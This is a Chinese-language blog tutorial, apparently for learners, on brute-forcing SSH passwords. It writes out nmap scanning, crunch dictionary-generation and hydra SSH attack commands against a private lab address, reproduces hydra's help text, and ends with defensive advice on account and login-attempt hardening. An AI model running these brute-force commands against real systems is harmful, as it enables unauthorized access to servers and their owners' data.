聲明:謝絕一切形式的轉載,禁止用作非法目的。工具nmap和hydra(Kali Linux自帶) nmap 是掃描工具 hydra 暴力破解工具第一步 掃描nmap在網絡掃描,漏洞發現等收集信息方面有舉足輕重的地位。後續會專門講解nmap的使用,這個工具讓我對網絡有瞭更進一步的認識。 這裡進行最簡單的掃描,查看被攻擊的機器開放的端口。 nmap 192.168.1.103從上圖中可以看出ssh是開啟的。第二部 暴力破解暴力破解,自然離不開字典文件,如何生成字典,網上有很多的工具,當然也可以利用kali自帶的字典。生成字典在Linux下,使用比較多的是crunch。crunch是一種創建密碼字典工具,該字典通常用於暴力破解。使用Crunch工具生成的密碼可以發送到終端、文件或另一個程序。crunch [minimum length] [maximum length] [character set] [options]生成密碼列表的最小長度為4,最大長度為6,並使用0123456789為字符集,可通過下面的命令生成字典文件: crunch 4 6 0123456789 -o passwd.txt破解ssh使用下面的命令就可以對開啟ssh服務的機器進行攻擊,這種攻擊足矣讓很多服務器淪陷。可根據需要將相應的用戶名、密碼改為相應的字典文件。hydra -l burning -p 123456 -s 22 192.168.1.103 sshhydra使用的參數:Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]Options: -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -C FILE colon separated "login:pass" format, instead of -L/-P options -M FILE list of servers to attack, one entry per line, ':' to specify port -t TASKS run TASKS number of connects in parallel per target (default: 16) -U service module usage details -h more command line options (COMPLETE HELP) server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help)攻擊成功後的效果如下所示,這證明帳號密碼都是正確的。SSHSSH 為 Secure Shell 的縮寫,由 IETF 的網絡小組(Network Working Group)所制定;SSH 為建立在應用層基礎上的安全協議。SSH 是較可靠,專為遠程登錄會話和其他網絡服務提供安全性的協議。利用 SSH 協議可以有效防止遠程管理過程中的信息泄露問題。SSH最初是UNIX系統上的一個程序,後來又迅速擴展到其他操作平臺。SSH在正確使用時可彌補網絡中的漏洞。SSH客戶端適用於多種平臺。幾乎所有UNIX平臺—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平臺,都可運行SSH。寫在最後對於網站的ssh服務,需要謹慎開啟。雖然方便瞭遠程工作,但是也為黑客破解網站提供瞭一個很好的入口,有很多的網站,ssh使用默認的賬戶名,那破解難度又下降瞭一個級別。因此,如果一定要開啟服務,帳號密碼要合理設置。原則上,隻要有足夠大的硬盤空間,就能夠破解任意的帳號密碼。所以,有必要對用戶登陸次數進行限制。公眾號
本文出自快速备案,转载时请注明出处及相应链接。